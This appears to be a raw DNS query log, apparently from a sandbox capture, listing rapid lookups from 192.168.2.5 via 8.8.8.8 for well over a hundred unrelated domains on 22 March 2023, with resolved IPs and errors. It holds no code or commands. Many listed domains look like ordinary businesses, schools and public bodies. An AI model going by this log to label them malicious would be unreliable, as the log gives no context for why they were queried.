Mar 22, 2023 05:45:34.955990076 CET	8.8.8.8	192.168.2.5	0x7c5f	No error (0)	dayvo.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.955990076 CET	8.8.8.8	192.168.2.5	0x7c5f	No error (0)	dayvo.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.956589937 CET	8.8.8.8	192.168.2.5	0x9bb3	No error (0)	rtcasey.com		69.195.90.46	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.960171938 CET	8.8.8.8	192.168.2.5	0xf037	No error (0)	sidepath.com		34.193.204.92	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.960171938 CET	8.8.8.8	192.168.2.5	0xf037	No error (0)	sidepath.com		75.2.70.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.960171938 CET	8.8.8.8	192.168.2.5	0xf037	No error (0)	sidepath.com		99.83.190.102	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.960171938 CET	8.8.8.8	192.168.2.5	0xf037	No error (0)	sidepath.com		34.193.69.252	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.962793112 CET	8.8.8.8	192.168.2.5	0x5652	No error (0)	doggybag.org		213.186.33.16	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.965722084 CET	8.8.8.8	192.168.2.5	0x88c9	No error (0)	isom.org		192.124.249.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.966236115 CET	8.8.8.8	192.168.2.5	0xee97	No error (0)	floopis.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.967245102 CET	8.8.8.8	192.168.2.5	0xc85d	No error (0)	sledsport.ru		185.22.232.175	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.981441975 CET	8.8.8.8	192.168.2.5	0x3de9	Server failure (2)	atis-sk.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.984989882 CET	8.8.8.8	192.168.2.5	0xa2a2	No error (0)	ntc.edu.au		192.124.249.15	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:34.986886978 CET	8.8.8.8	192.168.2.5	0xab1	No error (0)	oozkranj.com		212.44.102.57	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.006587029 CET	8.8.8.8	192.168.2.5	0x5ef6	No error (0)	bd-style.com		107.165.223.27	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.039721966 CET	8.8.8.8	192.168.2.5	0xc9d4	No error (0)	pccj.net		172.67.148.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.039721966 CET	8.8.8.8	192.168.2.5	0xc9d4	No error (0)	pccj.net		104.21.29.72	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.039764881 CET	8.8.8.8	192.168.2.5	0x470b	No error (0)	mijash3.com		198.185.159.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.039764881 CET	8.8.8.8	192.168.2.5	0x470b	No error (0)	mijash3.com		198.185.159.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.039764881 CET	8.8.8.8	192.168.2.5	0x470b	No error (0)	mijash3.com		198.49.23.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.039764881 CET	8.8.8.8	192.168.2.5	0x470b	No error (0)	mijash3.com		198.49.23.144	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.042257071 CET	8.8.8.8	192.168.2.5	0xe6f9	Server failure (2)	avc.com.sa	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.049902916 CET	8.8.8.8	192.168.2.5	0x8dbf	No error (0)	touchfam.ca		15.197.142.173	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.049902916 CET	8.8.8.8	192.168.2.5	0x8dbf	No error (0)	touchfam.ca		3.33.152.147	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.051263094 CET	8.8.8.8	192.168.2.5	0x8382	No error (0)	nettlinx.org		202.53.77.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.060508013 CET	8.8.8.8	192.168.2.5	0x5681	No error (0)	at-shun.com		210.140.73.39	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.061763048 CET	8.8.8.8	192.168.2.5	0xe1cf	No error (0)	fundeo.com		172.67.97.62	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.061763048 CET	8.8.8.8	192.168.2.5	0xe1cf	No error (0)	fundeo.com		104.24.160.27	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.061763048 CET	8.8.8.8	192.168.2.5	0xe1cf	No error (0)	fundeo.com		104.24.161.27	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.063622952 CET	8.8.8.8	192.168.2.5	0x9c8c	Name error (3)	cpwpb.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.063750982 CET	8.8.8.8	192.168.2.5	0xf802	Server failure (2)	atis-sk.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.068799019 CET	8.8.8.8	192.168.2.5	0x3a2f	No error (0)	atbauk.org		104.21.92.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.068799019 CET	8.8.8.8	192.168.2.5	0x3a2f	No error (0)	atbauk.org		172.67.196.145	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.072109938 CET	8.8.8.8	192.168.2.5	0x7a77	No error (0)	shenhgts.net		199.59.243.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.091379881 CET	8.8.8.8	192.168.2.5	0x45e0	No error (0)	www.sclover3.com		157.112.182.239	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.091414928 CET	8.8.8.8	192.168.2.5	0xe1c8	No error (0)	bggs.com		35.230.155.43	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.091842890 CET	8.8.8.8	192.168.2.5	0x26bc	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.092808962 CET	8.8.8.8	192.168.2.5	0x6c2b	No error (0)	skypearl.com		153.122.170.15	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.092847109 CET	8.8.8.8	192.168.2.5	0xbad8	Name error (3)	cpwpb.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.095038891 CET	8.8.8.8	192.168.2.5	0x6eb2	No error (0)	btsi.com.ph		69.46.30.77	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.104700089 CET	8.8.8.8	192.168.2.5	0x639b	No error (0)	aluminox.es		37.59.243.164	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.109023094 CET	8.8.8.8	192.168.2.5	0xa077	No error (0)	mcseurope.nl		46.19.218.80	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.109443903 CET	8.8.8.8	192.168.2.5	0x8b6d	No error (0)	cyclad.pl		87.98.236.253	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.112377882 CET	8.8.8.8	192.168.2.5	0x29a8	Server failure (2)	atis-sk.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.122767925 CET	8.8.8.8	192.168.2.5	0xcb0a	Name error (3)	cpwpb.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.126619101 CET	8.8.8.8	192.168.2.5	0x4ff0	No error (0)	htsmx.net		63.251.106.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.131221056 CET	8.8.8.8	192.168.2.5	0xbd33	No error (0)	canasil.com		104.26.2.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.131221056 CET	8.8.8.8	192.168.2.5	0xbd33	No error (0)	canasil.com		172.67.68.180	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.131221056 CET	8.8.8.8	192.168.2.5	0xbd33	No error (0)	canasil.com		104.26.3.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.133501053 CET	8.8.8.8	192.168.2.5	0x6a2f	No error (0)	fdlymca.org		192.124.249.9	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.134584904 CET	8.8.8.8	192.168.2.5	0x6233	No error (0)	orbitgas.com		107.180.58.31	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.139033079 CET	8.8.8.8	192.168.2.5	0x2bde	No error (0)	bidroll.com		13.56.33.8	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.144808054 CET	8.8.8.8	192.168.2.5	0xd1c8	No error (0)	shittas.com		43.246.117.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.146037102 CET	8.8.8.8	192.168.2.5	0xaf30	No error (0)	adeesa.net		172.67.209.11	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.146037102 CET	8.8.8.8	192.168.2.5	0xaf30	No error (0)	adeesa.net		104.21.77.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.148658037 CET	8.8.8.8	192.168.2.5	0x837a	No error (0)	mackusick.com		217.160.0.179	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.154437065 CET	8.8.8.8	192.168.2.5	0x1db	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.178008080 CET	8.8.8.8	192.168.2.5	0xa6c1	No error (0)	avse.hu		185.129.138.60	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.189066887 CET	8.8.8.8	192.168.2.5	0xea9b	Server failure (2)	avc.com.sa	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.199157000 CET	8.8.8.8	192.168.2.5	0xb023	Name error (3)	koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.207756042 CET	8.8.8.8	192.168.2.5	0x97e7	No error (0)	orbitgas.com		107.180.58.31	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.216618061 CET	8.8.8.8	192.168.2.5	0x769e	No error (0)	603888.com	num6.17986.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:35.216618061 CET	8.8.8.8	192.168.2.5	0x769e	No error (0)	num6.17986.net		67.21.93.229	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.226766109 CET	8.8.8.8	192.168.2.5	0xf7e1	Name error (3)	koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.233095884 CET	8.8.8.8	192.168.2.5	0x506d	No error (0)	sigtoa.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.233095884 CET	8.8.8.8	192.168.2.5	0x506d	No error (0)	sigtoa.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.239434004 CET	8.8.8.8	192.168.2.5	0xbb82	No error (0)	techtrans.de		185.237.66.112	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.249629021 CET	8.8.8.8	192.168.2.5	0x14e4	No error (0)	webways.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.249629021 CET	8.8.8.8	192.168.2.5	0x14e4	No error (0)	webways.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.253318071 CET	8.8.8.8	192.168.2.5	0x3d6	Name error (3)	koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.268156052 CET	8.8.8.8	192.168.2.5	0xead2	No error (0)	nettlinx.org		202.53.77.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.272576094 CET	8.8.8.8	192.168.2.5	0x4596	No error (0)	cjcagent.com		157.112.187.75	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.275770903 CET	8.8.8.8	192.168.2.5	0x954a	No error (0)	hamaker.net		34.102.136.180	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.279092073 CET	8.8.8.8	192.168.2.5	0x8897	Name error (3)	89gospel.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.284084082 CET	8.8.8.8	192.168.2.5	0xd3aa	No error (0)	vonparis.com		23.185.0.4	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.297350883 CET	8.8.8.8	192.168.2.5	0x4dc7	No error (0)	aiolos-sa.gr		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.297350883 CET	8.8.8.8	192.168.2.5	0x4dc7	No error (0)	aiolos-sa.gr		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.309058905 CET	8.8.8.8	192.168.2.5	0x45ee	No error (0)	tbvlugus.nl		174.129.25.170	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.324840069 CET	8.8.8.8	192.168.2.5	0x2e76	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.337749004 CET	8.8.8.8	192.168.2.5	0xa9b8	Name error (3)	89gospel.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.340538979 CET	8.8.8.8	192.168.2.5	0x9b	Name error (3)	koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.346816063 CET	8.8.8.8	192.168.2.5	0x9c27	Name error (3)	ludea.cz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.358459949 CET	8.8.8.8	192.168.2.5	0x79aa	No error (0)	xsui.com		127.0.0.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.359179020 CET	8.8.8.8	192.168.2.5	0xafc1	Server failure (2)	avc.com.sa	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.372883081 CET	8.8.8.8	192.168.2.5	0x9761	Server failure (2)	websy.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.374510050 CET	8.8.8.8	192.168.2.5	0x3b81	Name error (3)	ludea.cz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.379054070 CET	8.8.8.8	192.168.2.5	0x9e2	Name error (3)	koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.379146099 CET	8.8.8.8	192.168.2.5	0xc984	Name error (3)	89gospel.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.379688978 CET	8.8.8.8	192.168.2.5	0xc21f	No error (0)	ifesnet.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.379688978 CET	8.8.8.8	192.168.2.5	0xc21f	No error (0)	ifesnet.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.405256987 CET	8.8.8.8	192.168.2.5	0xb18a	No error (0)	dbnet.at		188.94.254.88	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.426208019 CET	8.8.8.8	192.168.2.5	0xca71	No error (0)	usadig.com		198.100.146.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.431175947 CET	8.8.8.8	192.168.2.5	0xdab1	Name error (3)	ludea.cz	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.436012983 CET	8.8.8.8	192.168.2.5	0x8cd6	No error (0)	shenhgts.net		199.59.243.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.440562010 CET	8.8.8.8	192.168.2.5	0x33c	No error (0)	enguita.net		195.5.116.23	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.446944952 CET	8.8.8.8	192.168.2.5	0xfe09	No error (0)	cqdgroup.com		221.132.33.88	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.446983099 CET	8.8.8.8	192.168.2.5	0xd95	Name error (3)	koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.447626114 CET	8.8.8.8	192.168.2.5	0xfe8c	No error (0)	s5w.com		192.99.226.184	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.454984903 CET	8.8.8.8	192.168.2.5	0xadee	No error (0)	onzcda.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.454984903 CET	8.8.8.8	192.168.2.5	0xadee	No error (0)	onzcda.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.460182905 CET	8.8.8.8	192.168.2.5	0x7120	No error (0)	burstner.ru		62.122.170.171	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.472518921 CET	8.8.8.8	192.168.2.5	0xa390	No error (0)	insia.com		82.208.6.9	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.473640919 CET	8.8.8.8	192.168.2.5	0x7420	No error (0)	willsub.com		69.89.107.122	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.507646084 CET	8.8.8.8	192.168.2.5	0x77b2	No error (0)	iranytu.net		103.224.212.222	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.517230988 CET	8.8.8.8	192.168.2.5	0x83bf	Server failure (2)	atis-sk.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.531833887 CET	8.8.8.8	192.168.2.5	0x23c5	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.532365084 CET	8.8.8.8	192.168.2.5	0x66a5	No error (0)	rappich.de		89.31.143.1	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.532852888 CET	8.8.8.8	192.168.2.5	0xed30	No error (0)	akdeniz.nl		109.71.54.22	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.549108982 CET	8.8.8.8	192.168.2.5	0xacd9	No error (0)	hbfuels.com		85.233.160.148	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.558392048 CET	8.8.8.8	192.168.2.5	0x40f4	No error (0)	workplus.hu		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.558392048 CET	8.8.8.8	192.168.2.5	0x40f4	No error (0)	workplus.hu		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.558991909 CET	8.8.8.8	192.168.2.5	0x3427	Name error (3)	koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.567389011 CET	8.8.8.8	192.168.2.5	0x7688	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.569385052 CET	8.8.8.8	192.168.2.5	0xfc31	No error (0)	pleszew.policja.gov.pl		91.229.22.126	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.579139948 CET	8.8.8.8	192.168.2.5	0xe31c	No error (0)	skypearl.com		153.122.170.15	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.582781076 CET	8.8.8.8	192.168.2.5	0x3061	Name error (3)	koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.592256069 CET	8.8.8.8	192.168.2.5	0x3b67	Server failure (2)	atis-sk.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.608787060 CET	8.8.8.8	192.168.2.5	0x5a52	Name error (3)	koz1.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.623316050 CET	8.8.8.8	192.168.2.5	0xd553	Name error (3)	cpwpb.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.637429953 CET	8.8.8.8	192.168.2.5	0xdb52	No error (0)	kayoaiba.com		154.213.117.166	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.637638092 CET	8.8.8.8	192.168.2.5	0xfb75	No error (0)	sinwal.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.637638092 CET	8.8.8.8	192.168.2.5	0xfb75	No error (0)	sinwal.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.641661882 CET	8.8.8.8	192.168.2.5	0xdd14	Server failure (2)	atis-sk.ca	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.650186062 CET	8.8.8.8	192.168.2.5	0xe393	Name error (3)	cpwpb.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.654221058 CET	8.8.8.8	192.168.2.5	0x3ee6	No error (0)	cnti.krsn.ru		217.74.161.133	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.675859928 CET	8.8.8.8	192.168.2.5	0xa509	Name error (3)	cpwpb.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.680180073 CET	8.8.8.8	192.168.2.5	0xa385	No error (0)	roewer.de		45.142.176.225	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.682463884 CET	8.8.8.8	192.168.2.5	0xb9ed	No error (0)	ntc.edu.au		192.124.249.15	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.686935902 CET	8.8.8.8	192.168.2.5	0x4ce9	No error (0)	bossinst.com		205.178.189.131	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.694924116 CET	8.8.8.8	192.168.2.5	0xb2a4	No error (0)	ccrsi.org		198.209.253.30	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.736702919 CET	8.8.8.8	192.168.2.5	0x456e	No error (0)	impexnc.com		204.11.56.48	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.742065907 CET	8.8.8.8	192.168.2.5	0x4242	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.750557899 CET	8.8.8.8	192.168.2.5	0xad67	No error (0)	mkm-gr.com		79.124.76.247	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.756951094 CET	8.8.8.8	192.168.2.5	0xa059	No error (0)	gbmfg.com		151.101.2.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.756951094 CET	8.8.8.8	192.168.2.5	0xa059	No error (0)	gbmfg.com		151.101.66.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.756951094 CET	8.8.8.8	192.168.2.5	0xa059	No error (0)	gbmfg.com		151.101.130.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.756951094 CET	8.8.8.8	192.168.2.5	0xa059	No error (0)	gbmfg.com		151.101.194.132	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.786406040 CET	8.8.8.8	192.168.2.5	0x6f8d	No error (0)	mikihan.com		153.126.211.112	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.793303013 CET	8.8.8.8	192.168.2.5	0xbb62	Name error (3)	ktenergo.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.799180031 CET	8.8.8.8	192.168.2.5	0x442e	No error (0)	fifa-ews.com		104.21.10.34	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.799180031 CET	8.8.8.8	192.168.2.5	0x442e	No error (0)	fifa-ews.com		172.67.189.227	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.820983887 CET	8.8.8.8	192.168.2.5	0xffef	Name error (3)	ktenergo.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.845941067 CET	8.8.8.8	192.168.2.5	0x62d3	Server failure (2)	amele.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.861170053 CET	8.8.8.8	192.168.2.5	0x21b8	No error (0)	wantapc.net		157.7.107.49	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.865901947 CET	8.8.8.8	192.168.2.5	0xb386	Name error (3)	ktenergo.ru	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.885730982 CET	8.8.8.8	192.168.2.5	0xa0a	No error (0)	clinicasanluis.com.co		104.21.66.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.885730982 CET	8.8.8.8	192.168.2.5	0xa0a	No error (0)	clinicasanluis.com.co		172.67.164.178	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.888003111 CET	8.8.8.8	192.168.2.5	0x9cf	No error (0)	ccssinc.com		172.67.185.152	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.888003111 CET	8.8.8.8	192.168.2.5	0x9cf	No error (0)	ccssinc.com		104.21.19.68	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.954202890 CET	8.8.8.8	192.168.2.5	0xd57f	No error (0)	www.fnw.us	fnw.us		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:35.954202890 CET	8.8.8.8	192.168.2.5	0xd57f	No error (0)	fnw.us		137.118.26.67	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.965815067 CET	8.8.8.8	192.168.2.5	0xd684	Server failure (2)	awfraser.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.971729040 CET	8.8.8.8	192.168.2.5	0xd39a	Server failure (2)	www.ftchat.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.972058058 CET	8.8.8.8	192.168.2.5	0xc6ea	No error (0)	msl-lock.com		165.160.13.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.972058058 CET	8.8.8.8	192.168.2.5	0xc6ea	No error (0)	msl-lock.com		165.160.15.20	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.976535082 CET	8.8.8.8	192.168.2.5	0x1464	No error (0)	dspears.com	traff-2.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:35.976535082 CET	8.8.8.8	192.168.2.5	0x1464	No error (0)	traff-2.hugedomains.com	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Mar 22, 2023 05:45:35.976535082 CET	8.8.8.8	192.168.2.5	0x1464	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.253.23	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.976535082 CET	8.8.8.8	192.168.2.5	0x1464	No error (0)	hdr-nlb5-4e815dd67a14bf7f.elb.us-east-2.amazonaws.com		3.130.204.160	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:35.983555079 CET	8.8.8.8	192.168.2.5	0x6299	No error (0)	stopllc.com		162.241.233.114	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.003365040 CET	8.8.8.8	192.168.2.5	0x139d	No error (0)	nlcv.bas.bg		195.96.252.188	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.007204056 CET	8.8.8.8	192.168.2.5	0xd658	No error (0)	wantapc.net		157.7.107.49	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.009532928 CET	8.8.8.8	192.168.2.5	0x60ba	Name error (3)	www.wkhk.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.051147938 CET	8.8.8.8	192.168.2.5	0x9c67	No error (0)	htsmx.net		63.251.106.25	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.056761980 CET	8.8.8.8	192.168.2.5	0xd20d	No error (0)	nts-web.net		49.212.235.175	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.059920073 CET	8.8.8.8	192.168.2.5	0xdb21	Server failure (2)	clysma.com	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.065829039 CET	8.8.8.8	192.168.2.5	0x5916	No error (0)	coxkitchensandbaths.com		205.149.134.32	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.066648006 CET	8.8.8.8	192.168.2.5	0xaac1	No error (0)	popbook.com		47.91.167.60	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.066678047 CET	8.8.8.8	192.168.2.5	0x11dc	No error (0)	any-s.net		108.170.12.50	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.079674006 CET	8.8.8.8	192.168.2.5	0x2dc9	No error (0)	x96.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.079674006 CET	8.8.8.8	192.168.2.5	0x2dc9	No error (0)	x96.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.085431099 CET	8.8.8.8	192.168.2.5	0x6ac4	No error (0)	cbras.com		54.39.198.18	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.096978903 CET	8.8.8.8	192.168.2.5	0xa783	No error (0)	usadig.com		198.100.146.220	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.100451946 CET	8.8.8.8	192.168.2.5	0x8e98	No error (0)	hazmatt.com		205.178.189.131	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.109437943 CET	8.8.8.8	192.168.2.5	0xda98	No error (0)	scintel.com		23.239.201.14	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.139687061 CET	8.8.8.8	192.168.2.5	0x8e9c	Name error (3)	toundo.net	none	none	A (IP address)	IN (0x0001)	false
Mar 22, 2023 05:45:36.155123949 CET	8.8.8.8	192.168.2.5	0x749	No error (0)	yhsll.com		154.88.50.199	A (IP address)	IN (0x0001)	false
